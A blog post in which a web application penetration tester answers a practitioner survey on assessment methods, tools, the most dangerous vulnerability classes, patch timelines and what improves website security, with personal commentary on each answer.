Jeremiah Grossman has recently come out with a new web application survey. If you remember he did this about a month ago, with some fairly interesting results (I was surprised by a few of the results myself). Like I said, I promised to answer the survey the next time, and so I did, and here they are:
1) Who do you perform web application vulnerability assessments for?
a) Security vendor
c) Entertainment and/or educational purposes
d) Other (please specify)
b - generally larger companies but a few small ones
2) What is your most common web application vulnerability assessment
a) Source code review
b) Black Box
c) Combination of A and B
c - primarily I know nothing about the target in question other than what an attacker would see but afterwards I start asking questions and learn how the system works and then I find the really nasty holes. 70% of all attacks come from the inside, and it stands to reason there are more holes than are visible from the outside.
3) Do you use commercial vulnerability scanner products during your assessments? (Acunetix, Cenzic, Fortify, NTOBJECTives, Ounce Labs, Secure Software, SPI Dynamic, Watchfire, etc.)
d) Most of the time
a - I have to live on the cheap since I do everything out of pocket these days - although that might change in the future.
4) Do you use open source tools during your assessments? (Paros, Burp, Live HTTP headers, Web Scarab, CAL9000, Nikto, Wikto, etc.)
d) Most of the time
c - I do use a lot of tools, but just as often I use my bare hands and my own homegrown tools.
5) What is your preferred severity rating system for web application
d - I haven’t been super happy with any of the various rating systems, so I use my own based on real world information rather than contrived theorems. I’ve never felt like a one size fits all approach to vulnerability assessment has made sense. I really like to think about the circumstances of a company and the vulnerability to weigh the actual risk to them, not to companies like them or even worse companies that have nothing at all in common to them.
6) What is the single most dangerous and widespread web application vulnerability?
a) Cross-Site Scripting (XSS)
b) Cross-Site Request Forgery (CSRF)
c) PHP Include
d) SQL Injection
e) Other (please specify)
c - Jeremiah and I talked about this one being kinda a weird question as A and B are definitely the most widespread, but C is the most dangerous as it can lead to all the others plus remote server compromise.
7) Are Cross-Site Request Forgeries (CSRF) part of your vulnerability assessment methodology?
a - I definitely look for and think about it, although it’s difficult to have people take it seriously, and it is harder to detect as it often requires a user account and that’s something I generally don’t do when I am doing high level passes over applications. However it SHOULD be a part of everyone’s testing, since it’s clearly not part of the tests performed by application scanners.
From your vulnerability assessment experience, how many websites have serious web application vulnerabilities? (reveal private information, escalate privileges, or allow remote compromise)
a) All or nearly all
e) No idea
c - The reason this rates so high is because of the amount of server vulnerabilities either by stand alone applications that haven’t been patched or via things like PHP includes in open source applications. Yay for open source!
9) How long would it take you find a single serious web application vulnerability in MOST public websites?
a) Few minutes
b) Hour or two
c) Day and a night
d) A few days
e) Don’t know, never tried
a - Thankfully most people (not large companies but most websites in general) use open source, making this job much easier.
10) How long after a web application vulnerability assessment are most of the severe issues resolved?
a) Within hours
b) The next couple days
c) During the next scheduled software update
d) Months from discovery
e) Just before the next annual assessment
c - Generally companies patch whenever they can, I’ve found. It’s fairly rare for them to patch outside of a sanctioned development release. Often times there are regulatory concerns if they don’t do so.
11) What organizational activity MOST improved the security of their websites?
a) Using modern software development frameworks (.NET, J2EE, Ruby on Rails, etc)
b) Secure software and/or awareness training
c) A stronger security presence in the SDLC
d) Compliance to industry regulations
e) Other (please specify)
e - Baseline threats and compare against baseline on a release by release. eventually tying that information into bonus structure for management. Everything else follows nicely.
12) Are you privy to any undisclosed (not made public) malicious attacks made against a web application? (fraud, identify theft, extortion, theft of intellectual property, etc.)
c) A few
d) Too many to count
So feel free to take the survey for yourself. He’s posted the survey here for everyone to take if they wish. I really recommend you do if you are a web application security penetration tester because some of these results are pretty fascinating and help all of us make decisions on where to take things in the future.